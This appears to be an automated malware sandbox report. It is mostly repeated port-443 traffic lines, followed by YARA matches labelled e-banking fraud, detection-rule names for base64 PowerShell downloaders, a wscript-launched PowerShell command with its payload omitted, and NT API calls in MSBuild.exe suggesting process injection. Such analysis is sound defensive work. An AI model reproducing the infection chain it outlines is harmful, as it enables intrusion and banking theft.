                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49895
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49773
                  Source: unknown | Network traffic detected: HTTP traffic on port 49862 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49894
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49772
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49893
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49771
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49892
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49770
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49891
                  Source: unknown | Network traffic detected: HTTP traffic on port 49671 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49897 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49911 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                  Source: unknown | HTTPS traffic detected: 104.22.69.199:443 -> 192.168.2.8:49693 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.8:49694 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.22.69.199:443 -> 192.168.2.8:49695 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.8:49696 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.8:49708 version: TLS 1.2

                  E-Banking Fraud

                  Source: Yara match | File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000C.00000002.2229860985.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000C.00000002.2229410762.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000C.00000002.2226580404.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1277774749.0000000002860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000B.00000002.2229866615.0000000002E70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1258834116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1262010486.0000000001930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000014.00000002.2232234775.00000000056B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                  System Summary

                  Source: 8.2.powershell.exe.15d903ef8d0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste | Author: ditekSHen
                  Source: 8.2.powershell.exe.15d903ef8d0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects known downloader agent | Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 7780, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 7916, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 8040, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
                  Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = '[obfuscated base64-encoded payload omitted]'
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_0042CBB3 NtClose
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A835C0 NtCreateMutant,LdrInitializeThunk
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82B60 NtClose,LdrInitializeThunk
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82DF0 NtQuerySystemInformation,LdrInitializeThunk
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82C70 NtFreeVirtualMemory,LdrInitializeThunk
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A83090 NtSetValueKey
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A83010 NtOpenDirectoryObject
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A84340 NtSetContextThread
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A84650 NtSuspendThread
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A839B0 NtGetContextThread
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82BA0 NtEnumerateValueKey
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82B80 NtQueryInformationFile
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82BE0 NtQueryValueKey
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82BF0 NtAllocateVirtualMemory
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82AB0 NtWaitForSingleObject
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82AF0 NtWriteFile
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82AD0 NtReadFile
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82DB0 NtEnumerateKey
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82DD0 NtDelayExecution
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82D30 NtUnmapViewOfSection
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82D00 NtSetInformationFile
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A83D10 NtOpenProcessToken
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82D10 NtMapViewOfSection
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A83D70 NtOpenThread
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82CA0 NtQueryInformationToken
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82CF0 NtOpenProcess
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82CC0 NtQueryVirtualMemory
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82C00 NtQueryInformationProcess
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82C60 NtCreateKey
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82FA0 NtQuerySection
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82FB0 NtResumeThread
